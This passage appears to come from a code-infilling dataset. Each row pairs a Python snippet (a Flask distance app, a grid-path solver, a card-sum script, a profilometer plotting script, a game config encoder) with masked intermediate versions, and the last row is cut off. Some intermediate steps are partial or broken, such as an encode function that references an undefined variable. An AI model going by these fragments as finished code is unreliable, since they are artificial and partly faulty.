code (string) | order_type (string, 2 classes) | original_example (dict) | step_ids (list, length 1-5)
---|---|---|---|
from flask import Flask, render_template, request
from distance import get_distance
app = Flask(__name__)
@app.route('/hello')
@app.route('/hello/<name>')
def hello(name=None):
name = "World" if not name else name
return "Hello %s" % name
@app.route('/')
def index():
return render_template('index.html', title='home')
@app.route('/distance', methods=['POST', 'GET'])
def distance():
result = None
if request.method == 'POST':
location_a = request.form['location_a']
location_b = request.form['location_b']
result = get_distance(location_a, location_b)
return render_template('distance.html', title='Afstand', result=result)
if __name__ == '__main__':
app.run(debug=True)
|
normal
|
{
"blob_id": "05052e9ccbd076e71e9ec6148887ce7b82ed316d",
"index": 6256,
"step-1": "<mask token>\n\n\[email protected]('/hello')\[email protected]('/hello/<name>')\ndef hello(name=None):\n name = 'World' if not name else name\n return 'Hello %s' % name\n\n\[email protected]('/')\ndef index():\n return render_template('index.html', title='home')\n\n\[email protected]('/distance', methods=['POST', 'GET'])\ndef distance():\n result = None\n if request.method == 'POST':\n location_a = request.form['location_a']\n location_b = request.form['location_b']\n result = get_distance(location_a, location_b)\n return render_template('distance.html', title='Afstand', result=result)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\[email protected]('/hello')\[email protected]('/hello/<name>')\ndef hello(name=None):\n name = 'World' if not name else name\n return 'Hello %s' % name\n\n\[email protected]('/')\ndef index():\n return render_template('index.html', title='home')\n\n\[email protected]('/distance', methods=['POST', 'GET'])\ndef distance():\n result = None\n if request.method == 'POST':\n location_a = request.form['location_a']\n location_b = request.form['location_b']\n result = get_distance(location_a, location_b)\n return render_template('distance.html', title='Afstand', result=result)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n",
"step-3": "<mask token>\napp = Flask(__name__)\n\n\[email protected]('/hello')\[email protected]('/hello/<name>')\ndef hello(name=None):\n name = 'World' if not name else name\n return 'Hello %s' % name\n\n\[email protected]('/')\ndef index():\n return render_template('index.html', title='home')\n\n\[email protected]('/distance', methods=['POST', 'GET'])\ndef distance():\n result = None\n if request.method == 'POST':\n location_a = request.form['location_a']\n location_b = request.form['location_b']\n result = get_distance(location_a, location_b)\n return render_template('distance.html', title='Afstand', result=result)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n",
"step-4": "from flask import Flask, render_template, request\nfrom distance import get_distance\napp = Flask(__name__)\n\n\[email protected]('/hello')\[email protected]('/hello/<name>')\ndef hello(name=None):\n name = 'World' if not name else name\n return 'Hello %s' % name\n\n\[email protected]('/')\ndef index():\n return render_template('index.html', title='home')\n\n\[email protected]('/distance', methods=['POST', 'GET'])\ndef distance():\n result = None\n if request.method == 'POST':\n location_a = request.form['location_a']\n location_b = request.form['location_b']\n result = get_distance(location_a, location_b)\n return render_template('distance.html', title='Afstand', result=result)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n",
"step-5": "from flask import Flask, render_template, request\nfrom distance import get_distance\n\napp = Flask(__name__)\n\n\[email protected]('/hello')\[email protected]('/hello/<name>')\ndef hello(name=None):\n name = \"World\" if not name else name\n return \"Hello %s\" % name\n\n\[email protected]('/')\ndef index():\n return render_template('index.html', title='home')\n\n\[email protected]('/distance', methods=['POST', 'GET'])\ndef distance():\n result = None\n if request.method == 'POST':\n location_a = request.form['location_a']\n location_b = request.form['location_b']\n result = get_distance(location_a, location_b)\n\n return render_template('distance.html', title='Afstand', result=result)\n\nif __name__ == '__main__':\n app.run(debug=True)\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
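
The app in this record imports `get_distance` from a `distance` module that is not included. A minimal stand-in sketch (the module name comes from the import; the coordinate table and the straight-line math are assumptions, not the record's actual implementation) so the final step can run:

```python
# distance.py -- hypothetical stand-in for the imported module
from math import dist

# assumed lookup table; the real module presumably geocodes the inputs
_COORDS = {'amsterdam': (52.37, 4.90), 'utrecht': (52.09, 5.12)}

def get_distance(location_a, location_b):
    """Straight-line distance (in coordinate degrees) between two known places."""
    return dist(_COORDS[location_a.lower()], _COORDS[location_b.lower()])
```
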
<|reserved_special_token_0|>
class Solution:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution:
def uniquePaths(self, m: int, n: int) ->int:
map_: List[List[int]] = [[(0 if i > 0 and j > 0 else 1) for j in
range(m)] for i in range(n)]
for row in range(1, n):
for col in range(1, m):
map_[row][col] = map_[row][col - 1] + map_[row - 1][col]
return map_[-1][-1]
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution:
def uniquePaths(self, m: int, n: int) ->int:
map_: List[List[int]] = [[(0 if i > 0 and j > 0 else 1) for j in
range(m)] for i in range(n)]
for row in range(1, n):
for col in range(1, m):
map_[row][col] = map_[row][col - 1] + map_[row - 1][col]
return map_[-1][-1]
print(Solution().uniquePaths(7, 3))
<|reserved_special_token_1|>
from typing import *
class Solution:
def uniquePaths(self, m: int, n: int) ->int:
map_: List[List[int]] = [[(0 if i > 0 and j > 0 else 1) for j in
range(m)] for i in range(n)]
for row in range(1, n):
for col in range(1, m):
map_[row][col] = map_[row][col - 1] + map_[row - 1][col]
return map_[-1][-1]
print(Solution().uniquePaths(7, 3))
<|reserved_special_token_1|>
from typing import *
class Solution:
def uniquePaths(self, m: int, n: int) -> int:
map_: List[List[int]] = [[0 if (i > 0 and j > 0) else 1 for j in range(m)] for i in range(n)]
for row in range(1, n):
for col in range(1, m):
map_[row][col] = map_[row][col - 1] + map_[row - 1][col]
# [map_[row][col] := map_[row][col - 1] + map_[row - 1][col] for col in range(1, m) for row in range(1, n)]
return map_[-1][-1]
print(Solution().uniquePaths(7, 3))
|
flexible
|
{
"blob_id": "e2a38d38d2ab750cf775ed0fbdb56bc6fc7300c4",
"index": 8934,
"step-1": "<mask token>\n\n\nclass Solution:\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Solution:\n\n def uniquePaths(self, m: int, n: int) ->int:\n map_: List[List[int]] = [[(0 if i > 0 and j > 0 else 1) for j in\n range(m)] for i in range(n)]\n for row in range(1, n):\n for col in range(1, m):\n map_[row][col] = map_[row][col - 1] + map_[row - 1][col]\n return map_[-1][-1]\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Solution:\n\n def uniquePaths(self, m: int, n: int) ->int:\n map_: List[List[int]] = [[(0 if i > 0 and j > 0 else 1) for j in\n range(m)] for i in range(n)]\n for row in range(1, n):\n for col in range(1, m):\n map_[row][col] = map_[row][col - 1] + map_[row - 1][col]\n return map_[-1][-1]\n\n\nprint(Solution().uniquePaths(7, 3))\n",
"step-4": "from typing import *\n\n\nclass Solution:\n\n def uniquePaths(self, m: int, n: int) ->int:\n map_: List[List[int]] = [[(0 if i > 0 and j > 0 else 1) for j in\n range(m)] for i in range(n)]\n for row in range(1, n):\n for col in range(1, m):\n map_[row][col] = map_[row][col - 1] + map_[row - 1][col]\n return map_[-1][-1]\n\n\nprint(Solution().uniquePaths(7, 3))\n",
"step-5": "from typing import *\n\n\nclass Solution:\n def uniquePaths(self, m: int, n: int) -> int:\n map_: List[List[int]] = [[0 if (i > 0 and j > 0) else 1 for j in range(m)] for i in range(n)]\n for row in range(1, n):\n for col in range(1, m):\n map_[row][col] = map_[row][col - 1] + map_[row - 1][col]\n\n # [map_[row][col] := map_[row][col - 1] + map_[row - 1][col] for col in range(1, m) for row in range(1, n)]\n return map_[-1][-1]\n\n\nprint(Solution().uniquePaths(7, 3))\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
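
The masked steps above converge on a dynamic-programming grid for the Unique Paths problem. As an independent check (not part of the record), the count has the closed form C(m+n-2, m-1), so the printed `uniquePaths(7, 3)` should equal 28:

```python
from math import comb  # Python 3.8+

def unique_paths_closed_form(m: int, n: int) -> int:
    # a path is a choice of which m-1 of its m+n-2 moves go rightwards
    return comb(m + n - 2, m - 1)

assert unique_paths_closed_form(7, 3) == 28  # matches the DP result
```
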
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def main():
A1, A2, A3 = map(int, input().split())
A = A1 + A2 + A3
if A >= 22:
ans = 'bust'
else:
ans = 'win'
print(ans)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def main():
A1, A2, A3 = map(int, input().split())
A = A1 + A2 + A3
if A >= 22:
ans = 'bust'
else:
ans = 'win'
print(ans)
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
#!/usr/bin/env python3
def main():
A1, A2, A3 = map(int, input().split())
A=A1+A2+A3
if A >=22:
ans='bust'
else:
ans='win'
print(ans)
if __name__ == "__main__":
main()
|
flexible
|
{
"blob_id": "753e062940e0580d7d33c88c1165977142dcd202",
"index": 8060,
"step-1": "<mask token>\n",
"step-2": "def main():\n A1, A2, A3 = map(int, input().split())\n A = A1 + A2 + A3\n if A >= 22:\n ans = 'bust'\n else:\n ans = 'win'\n print(ans)\n\n\n<mask token>\n",
"step-3": "def main():\n A1, A2, A3 = map(int, input().split())\n A = A1 + A2 + A3\n if A >= 22:\n ans = 'bust'\n else:\n ans = 'win'\n print(ans)\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "#!/usr/bin/env python3\n\ndef main():\n A1, A2, A3 = map(int, input().split())\n A=A1+A2+A3\n if A >=22:\n ans='bust'\n else:\n ans='win'\n print(ans)\n \nif __name__ == \"__main__\":\n main()\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
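
A quick way to exercise the final step of this record without a terminal is to patch `input` (a sketch; the threshold 22 is taken straight from the code):

```python
from unittest import mock

def main():
    A1, A2, A3 = map(int, input().split())
    print('bust' if A1 + A2 + A3 >= 22 else 'win')

with mock.patch('builtins.input', return_value='5 7 9'):
    main()  # 21 < 22 -> prints "win"
with mock.patch('builtins.input', return_value='9 9 9'):
    main()  # 27 >= 22 -> prints "bust"
```
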
import numpy as np
import matplotlib.pyplot as plt
import math
filename = '/home/kolan/mycode/python/dektak/data/t10_1_1_normal.csv'
#filename = '/home/kolan/mycode/python/dektak/t10_1_3_normal.csv'
#filename = '/home/kolan/mycode/python/dektak/t10_1_6_normal.csv'
#filename = '/home/kolan/mycode/python/dektak/t10_1_7_normal.csv'
#filename = '/home/kolan/mycode/python/dektak/t10_1_3_parallel.csv'
def FindHeaderLength():
    """
    Finds the position of the 'Lateral um' marker and adds 4 more lines
    to give as a result the length of the header in number of lines.
    This is then used as the skiprows argument of np.loadtxt below.
    """
    lookup = 'Lateral um'
    with open(filename) as myFile:
        for FoundPosition, line in enumerate(myFile, 1):
            if lookup in line:
                print('Scan Data found at line:', FoundPosition)
                break
    return FoundPosition+4
x=np.loadtxt(filename,dtype=float,delimiter=',',skiprows=FindHeaderLength(),usecols=(0,))
y=np.loadtxt(filename,dtype=float,delimiter=',',skiprows=FindHeaderLength(),usecols=(1,))
coefficients = np.polyfit(x, y, 1)
polynomial = np.poly1d(coefficients)
ys = polynomial(x)
print(coefficients)
print(polynomial)
yLevelled=y-ys
plt.figure(1)
plt.plot(x,y)
plt.plot(x,ys)
plt.title('Raw data plot')
plt.xlabel('Lateral [um]')
plt.ylabel('Raw Micrometer [um]')
plt.grid(True)
plt.figure(2)
plt.title('Histogram of y')
n, bins, patches = plt.hist(y, 256, density=True, facecolor='g', alpha=0.75)
plt.grid(True)
plt.figure(3)
d = np.diff(y)
plt.plot(d)
plt.title('Derivative of y')
plt.xlabel('Point []')
plt.ylabel('Raw Micrometer [um]')
plt.grid(True)
plt.figure(4)
plt.plot(x,yLevelled)
plt.title('Levelled data plot')
plt.xlabel('Lateral [um]')
plt.ylabel('Micrometer [um]')
plt.grid(True)
plt.figure(5)
plt.title('Histogram of yLevelled')
n, bins, patches = plt.hist(yLevelled, 256, density=True, facecolor='g', alpha=0.75)
plt.grid(True)
dataLenght = len(yLevelled)
xDiff = np.delete(x,dataLenght-1) #diff consumes one last element from the array
plt.figure(6)
d = np.diff(y)
plt.plot(xDiff,d)
plt.title('Derivative of y')
plt.xlabel('Lateral [um]')
plt.ylabel('Raw Micrometer [um]')
plt.grid(True)
yLevelledMin = np.min(yLevelled)
yLevelledZeroShift = yLevelled - yLevelledMin
plt.figure(7)
plt.plot(x,yLevelledZeroShift)
plt.title('Levelled and shifted data plot')
plt.xlabel('Lateral [um]')
plt.ylabel('Micrometer [um]')
plt.grid(True)
##FFT###########################################################################
dataLenghtFFT = len(yLevelled)//2 #divide by 2 (integer) to satisfy rfft
# scale by the number of points so that
# the magnitude does not depend on the length
# of the signal or on its sampling frequency
calculatedFFT = np.fft.rfft(yLevelled)
#calculatedFFT = np.fft.rfft(yLevelledZeroShift)
amplitudeFFT = np.abs(calculatedFFT) #calculates FFT amplitude from
#complex calculatedFFT output
phaseFFT = np.angle(calculatedFFT) #calculates FFT phase from
#complex calculatedFFT output
phaseDegreesFFT = np.rad2deg(phaseFFT) #convert to degrees
amplitudeScaledFFT = amplitudeFFT/float(dataLenghtFFT)
# scale by the number of points so that
# the magnitude does not depend on the length
# of the signal
amplitudeScaledRMSFFT = amplitudeFFT/float(dataLenghtFFT)/math.sqrt(2)
# Scaling to Root mean square amplitude (dataLenghtFFT/sqrt{2}),
#############################################################################
# Plot the results
#############################################################################
xFFT = np.linspace(0,dataLenghtFFT+1,dataLenghtFFT+1)
#the range is two times smaller +1 for RFFT
#sinus signal without noise used for fit
plt.figure("FFT amplitude and phase coefficients")
plt.subplot(2,1,1)
plt.vlines(xFFT,0,amplitudeScaledFFT)
plt.title("FFT amplitude coefficients")
plt.xlabel("Harmonics")
plt.ylabel("Amplitude [V]")
plt.xlim(0,dataLenghtFFT/2+1) #adjusts the x axis to maximum of numberOfPoints
plt.grid(True)
plt.subplot(2,1,2)
plt.vlines(xFFT,0,phaseDegreesFFT)
plt.title("FFT phase coefficients")
plt.xlabel("Harmonics")
plt.ylabel("Phase [deg]")
plt.tight_layout() #removes the overlapping of the labels in subplots
plt.xlim(0,dataLenghtFFT+1)
plt.grid(True)
##############################################################################
##Moving average
##############################################################################
plt.figure('LevelledData with moving average ')
yLevelledMA = np.convolve(yLevelled, np.ones(10)/10)
plt.plot(yLevelled)
plt.plot(yLevelledMA)  # successive calls draw on the same axes; plt.hold was removed in matplotlib 3.0
plt.title('Filtered levelled data plot')
plt.xlabel('Sample []')
plt.ylabel('Micrometer [um]')
plt.grid(True)
## horizontal line
diffMA = np.convolve(d, np.ones(10)/10)
dataLenghtDiff = len(d)
dataLenghtDiffMA = len(diffMA)
xLine = np.linspace(0,dataLenghtDiffMA,dataLenghtDiffMA)
yLine = np.linspace(0.05,0.05,dataLenghtDiffMA)
plt.figure('Derivative with moving average')
plt.plot(d)
plt.plot(diffMA)
plt.plot(yLine)
plt.title('Derivative with moving average')
plt.xlabel('Sample []')
plt.ylabel('Micrometer [um]')
plt.grid(True)
print(dataLenghtDiff)
print(dataLenghtDiffMA)
#thresholded = np.array(diffMA)
#x = np.where(thresholded == 0.05)[0]
#print x
#plt.figure('Derivative with moving average thresholded')
#plt.plot(thresholded)
#plt.title('Derivative with moving average')
#plt.xlabel('Sample []')
#plt.ylabel('Micrometer [um]')
#plt.grid(True)
#
#itemindex = np.where(diffMA > 0.05 and diffMA < 0.051)
plt.show()
|
normal
|
{
"blob_id": "139d06497a44031f6414980ad54454477e3d0b2c",
"index": 4540,
"step-1": "import numpy as np \nimport matplotlib.pyplot as plt\nimport math\n\nfilename = '/home/kolan/mycode/python/dektak/data/t10_1_1_normal.csv'\n#filename = '/home/kolan/mycode/python/dektak/t10_1_3_normal.csv'\n#filename = '/home/kolan/mycode/python/dektak/t10_1_6_normal.csv'\n#filename = '/home/kolan/mycode/python/dektak/t10_1_7_normal.csv'\n#filename = '/home/kolan/mycode/python/dektak/t10_1_3_parallel.csv'\n\n\n\ndef FindHeaderLength():\n \"\"\"\n Finds the positionon the 'Scan Data' and adds additional 2 lines\n to give as a result the lenght of the header in number of lines.\n This is then used in csv function\n \"\"\"\n\n lookup = 'Lateral um'\n \n with open(filename) as myFile:\n for FoundPosition, line in enumerate(myFile, 1):\n if lookup in line:\n print 'Scan Data found at line:', FoundPosition\n break\n \n return FoundPosition+4\n\n\nx=np.loadtxt(filename,dtype=float,delimiter=',',skiprows=FindHeaderLength(),usecols=(0,))\ny=np.loadtxt(filename,dtype=float,delimiter=',',skiprows=FindHeaderLength(),usecols=(1,))\n\ncoefficients = np.polyfit(x, y, 1)\npolynomial = np.poly1d(coefficients)\nys = polynomial(x)\nprint coefficients\nprint polynomial\n\nyLevelled=y-ys\n\nplt.figure(1)\nplt.plot(x,y)\nplt.plot(x,ys)\nplt.title('Raw data plot')\nplt.xlabel('Lateral [um]')\nplt.ylabel('Raw Micrometer [um]')\nplt.grid(True)\n\nplt.figure(2)\nplt.title('Histogram of y')\nn, bins, patches = plt.hist(y, 256, normed=1, facecolor='g', alpha=0.75)\nplt.grid(True)\n\nplt.figure(3)\nd = np.diff(y)\nplt.plot(d)\nplt.title('Derivative of y')\nplt.xlabel('Point []')\nplt.ylabel('Raw Micrometer [um]')\nplt.grid(True)\n\nplt.figure(4)\nplt.plot(x,yLevelled)\nplt.title('Levelled data plot')\nplt.xlabel('Lateral [um]')\nplt.ylabel('Micrometer [um]')\nplt.grid(True)\n\nplt.figure(5)\nplt.title('Histogram of yLevelled')\nn, bins, patches = plt.hist(yLevelled, 256, normed=1, facecolor='g', alpha=0.75)\nplt.grid(True)\n\ndataLenght = len(yLevelled) \nxDiff = np.delete(x,dataLenght-1) #diff consumes one last element from the array\n\nplt.figure(6)\nd = np.diff(y)\nplt.plot(xDiff,d)\nplt.title('Derivative of y')\nplt.xlabel('Lateral [um]')\nplt.ylabel('Raw Micrometer [um]')\nplt.grid(True)\n\nyLevelledMin = np.min(yLevelled)\nyLevelledZeroShift = yLevelled - yLevelledMin\n\nplt.figure(7)\nplt.plot(x,yLevelledZeroShift)\nplt.title('Levelled and shifted data plot')\nplt.xlabel('Lateral [um]')\nplt.ylabel('Micrometer [um]')\nplt.grid(True)\n\n##FFT###########################################################################\n\ndataLenghtFFT = len(yLevelled)/2 #divide by 2 to satify rfft\n # scale by the number of points so that\n # the magnitude does not depend on the length \n # of the signal or on its sampling frequency \n\ncalculatedFFT = np.fft.rfft(yLevelled) \n#calculatedFFT = np.fft.rfft(yLevelledZeroShift) \n\namplitudeFFT = np.abs(calculatedFFT) #calculates FFT amplitude from \n #complex calculatedFFT output\nphaseFFT = np.angle(calculatedFFT) #calculates FFT phase from \n #complex calculatedFFT output\nphaseDegreesFFT = np.rad2deg(phaseFFT) #convert to degrees\namplitudeScaledFFT = amplitudeFFT/float(dataLenghtFFT)\n # scale by the number of points so that\n # the magnitude does not depend on the length \n # of the signal\namplitudeScaledRMSFFT = amplitudeFFT/float(dataLenghtFFT)/math.sqrt(2)\n\n\n# Scaling to Root mean square amplitude (dataLenghtFFT/sqrt{2}),\n#############################################################################\n# Plot the 
results\n#############################################################################\n\nxFFT = np.linspace(0,dataLenghtFFT+1,dataLenghtFFT+1) \n #the range is two times smaller +1 for RFFT\n #sinus signal without noise used for fit\n\nplt.figure(\"FFT amplitude and phase coefficients\")\nplt.subplot(2,1,1)\nplt.vlines(xFFT,0,amplitudeScaledFFT)\nplt.title(\"FFT amplitude coefficients\")\nplt.xlabel(\"Harmonics\")\nplt.ylabel(\"Amplitude [V]\")\nplt.xlim(0,dataLenghtFFT/2+1) #adjuts the x axis to maximum of numberOfPoints\nplt.grid(True)\n\nplt.subplot(2,1,2)\nplt.vlines(xFFT,0,phaseDegreesFFT)\nplt.title(\"FFT phase coefficients\")\nplt.xlabel(\"Harmonics\")\nplt.ylabel(\"Phase [deg]\")\nplt.tight_layout() #removes the overlapping of the labels in subplots\nplt.xlim(0,dataLenghtFFT+1)\nplt.grid(True)\n\n\n##############################################################################\n##Moving average\n##############################################################################\nplt.figure('LevelledData with moving average ')\nyLevelledMA = np.convolve(yLevelled, np.ones(10)/10)\nplt.plot(yLevelled)\nplt.hold(True)\nplt.plot(yLevelledMA)\nplt.title('Filtered levelled data plot')\nplt.xlabel('Sample []')\nplt.ylabel('Micrometer [um]')\nplt.grid(True)\n\n##orizontal line\n\n\n\ndiffMA = np.convolve(d, np.ones(10)/10)\n\ndataLenghtDiff = len(d)\ndataLenghtDiffMA = len(diffMA)\n\nxLine = np.linspace(0,dataLenghtDiffMA,dataLenghtDiffMA)\nyLine = np.linspace(0.05,0.05,dataLenghtDiffMA) \n\nplt.figure('Derivative with moving average')\nplt.plot(d)\nplt.hold(True)\nplt.plot(diffMA)\nplt.plot(yLine)\nplt.title('Derivative with moving average')\nplt.xlabel('Sample []')\nplt.ylabel('Micrometer [um]')\nplt.grid(True)\n\n\n\nprint dataLenghtDiff\nprint dataLenghtDiffMA\n\n\n\n#thresholded = np.array(diffMA)\n#x = np.where(thresholded == 0.05)[0]\n#print x\n#plt.figure('Derivative with moving average thresholded')\n#plt.plot(thresholded)\n#plt.title('Derivative with moving average')\n#plt.xlabel('Sample []')\n#plt.ylabel('Micrometer [um]')\n#plt.grid(True)\n#\n#itemindex = np.where(diffMA > 0.05 and diffMA < 0.051)\n\nplt.show()",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
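
One pitfall in the script above: `np.convolve` defaults to `mode='full'`, so `yLevelledMA` comes back 9 samples longer than `yLevelled` and the smoothed trace is shifted against the raw one when both are plotted. A sketch of the aligned variant (illustrative data only):

```python
import numpy as np

y = np.random.rand(200)                               # stand-in for yLevelled
y_ma = np.convolve(y, np.ones(10) / 10, mode='same')  # output aligned with input
assert len(y_ma) == len(y)
```
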
<|reserved_special_token_0|>
def decode(value):
out_value = ''
char = [value[i:i + 2] for i in range(0, len(value), 2)]
for i in range(0, len(char)):
out_value += decoded[encoded.index(char[i])]
return out_value
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def decode(value):
out_value = ''
char = [value[i:i + 2] for i in range(0, len(value), 2)]
for i in range(0, len(char)):
out_value += decoded[encoded.index(char[i])]
return out_value
def encode(value):
out_value = ''
char = [value[i:i + 1] for i in range(0, len(value))]
for i in range(0, len(char)):
out_value += encoded[decoded.index(char[i])]
return out_value
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def decode(value):
out_value = ''
char = [value[i:i + 2] for i in range(0, len(value), 2)]
for i in range(0, len(char)):
out_value += decoded[encoded.index(char[i])]
return out_value
def encode(value):
out_value = ''
char = [value[i:i + 1] for i in range(0, len(value))]
for i in range(0, len(char)):
out_value += encoded[decoded.index(char[i])]
return out_value
if __name__ == '__main__':
print(
        'By default the program will open UserCustom.ini which should be in the same directory as the program.'
)
user_input = str(input(
'Would you like to encode or decode UserCustom.ini ? (encode/decode) ')
)
const = '+CVars='
config = open('UserCustom.ini', 'r')
out_file = open('UserCustom.ini.out', 'w')
out_value = ''
lines = config.readlines()
for i in range(0, len(lines)):
if lines[i].startswith(const):
value = lines[i].split(const)[-1].split('\n')[0]
if user_input.lower() == 'encode' or user_input.lower() == 'e':
out_value = encode(value)
elif user_input.lower() == 'decode' or user_input.lower() == 'd':
out_value = decode(value)
out_file.write(const + out_value + '\n')
else:
out_file.write(lines[i])
out_file.close()
config.close()
pass
<|reserved_special_token_1|>
decoded = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'A', 'B', 'C',
'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q',
'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', 'a', 'b', 'c', 'd', 'e',
'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's',
't', 'u', 'v', 'w', 'x', 'y', 'z', '=', '.']
encoded = ['49', '48', '4B', '4A', '4D', '4C', '4F', '4E', '41', '40', '38',
'3B', '3A', '3D', '3C', '3F', '3E', '31', '30', '33', '32', '35', '34',
'37', '36', '29', '28', '2B', '2A', '2D', '2C', '2F', '2E', '21', '20',
'23', '18', '1B', '1A', '1D', '1C', '1F', '1E', '11', '10', '13', '12',
'15', '14', '17', '16', '09', '08', '0B', '0A', '0D', '0C', '0F', '0E',
'01', '00', '03', '44', '57']
def decode(value):
out_value = ''
char = [value[i:i + 2] for i in range(0, len(value), 2)]
for i in range(0, len(char)):
out_value += decoded[encoded.index(char[i])]
return out_value
def encode(value):
out_value = ''
char = [value[i:i + 1] for i in range(0, len(value))]
for i in range(0, len(char)):
out_value += encoded[decoded.index(char[i])]
return out_value
if __name__ == '__main__':
print(
        'By default the program will open UserCustom.ini which should be in the same directory as the program.'
)
user_input = str(input(
'Would you like to encode or decode UserCustom.ini ? (encode/decode) ')
)
const = '+CVars='
config = open('UserCustom.ini', 'r')
out_file = open('UserCustom.ini.out', 'w')
out_value = ''
lines = config.readlines()
for i in range(0, len(lines)):
if lines[i].startswith(const):
value = lines[i].split(const)[-1].split('\n')[0]
if user_input.lower() == 'encode' or user_input.lower() == 'e':
out_value = encode(value)
elif user_input.lower() == 'decode' or user_input.lower() == 'd':
out_value = decode(value)
out_file.write(const + out_value + '\n')
else:
out_file.write(lines[i])
out_file.close()
config.close()
pass
<|reserved_special_token_1|>
decoded = ["0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z", "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "=", "."]
encoded = ["49", "48", "4B", "4A", "4D", "4C", "4F", "4E", "41", "40", "38", "3B", "3A", "3D", "3C", "3F", "3E", "31", "30", "33", "32", "35", "34", "37", "36", "29", "28", "2B", "2A", "2D", "2C", "2F", "2E", "21", "20", "23", "18", "1B", "1A", "1D", "1C", "1F", "1E", "11", "10", "13", "12", "15", "14", "17", "16", "09", "08", "0B", "0A", "0D", "0C", "0F", "0E", "01", "00", "03", "44", "57"]
def decode(value) :
out_value = ""
char = [value[i:i+2] for i in range(0, len(value), 2)]
for i in range(0, len(char)) :
out_value += decoded[encoded.index(char[i])]
return out_value
def encode(value) :
out_value = ""
char = [value[i:i+1] for i in range(0, len(value))]
for i in range(0, len(char)) :
out_value += encoded[decoded.index(char[i])]
return out_value
if __name__ == "__main__" :
    print("By default the program will open UserCustom.ini which should be in the same directory as the program.")
user_input = str(input("Would you like to encode or decode UserCustom.ini ? (encode/decode) "))
const = "+CVars="
config = open("UserCustom.ini" , "r")
out_file = open("UserCustom.ini.out", "w")
out_value = ""
lines = config.readlines()
for i in range(0, len(lines)) :
if lines[i].startswith(const) :
value = lines[i].split(const)[-1].split("\n")[0]
if user_input.lower() == "encode" or user_input.lower() == "e" :
out_value = encode(value)
elif user_input.lower() == "decode" or user_input.lower() == "d" :
out_value = decode(value)
out_file.write(const + out_value + "\n")
else :
out_file.write(lines[i])
out_file.close()
config.close()
pass
|
flexible
|
{
"blob_id": "23236cd8262eb414666db88215c01d973abf1d97",
"index": 1247,
"step-1": "<mask token>\n\n\ndef decode(value):\n out_value = ''\n char = [value[i:i + 2] for i in range(0, len(value), 2)]\n for i in range(0, len(char)):\n out_value += decoded[encoded.index(char[i])]\n return out_value\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef decode(value):\n out_value = ''\n char = [value[i:i + 2] for i in range(0, len(value), 2)]\n for i in range(0, len(char)):\n out_value += decoded[encoded.index(char[i])]\n return out_value\n\n\ndef encode(char):\n out_value = ''\n char = [value[i:i + 1] for i in range(0, len(value))]\n for i in range(0, len(char)):\n out_value += encoded[decoded.index(char[i])]\n return out_value\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef decode(value):\n out_value = ''\n char = [value[i:i + 2] for i in range(0, len(value), 2)]\n for i in range(0, len(char)):\n out_value += decoded[encoded.index(char[i])]\n return out_value\n\n\ndef encode(char):\n out_value = ''\n char = [value[i:i + 1] for i in range(0, len(value))]\n for i in range(0, len(char)):\n out_value += encoded[decoded.index(char[i])]\n return out_value\n\n\nif __name__ == '__main__':\n print(\n 'By default the program will open UserCustom.ini which should be in the directory as the program.'\n )\n user_input = str(input(\n 'Would you like to encode or decode UserCustom.ini ? (encode/decode) ')\n )\n const = '+CVars='\n config = open('UserCustom.ini', 'r')\n out_file = open('UserCustom.ini.out', 'w')\n out_value = ''\n lines = config.readlines()\n for i in range(0, len(lines)):\n if lines[i].startswith(const):\n value = lines[i].split(const)[-1].split('\\n')[0]\n if user_input.lower() == 'encode' or user_input.lower() == 'e':\n out_value = encode(value)\n elif user_input.lower() == 'decode' or user_input.lower() == 'd':\n out_value = decode(value)\n out_file.write(const + out_value + '\\n')\n else:\n out_file.write(lines[i])\n out_file.close()\n config.close()\n pass\n",
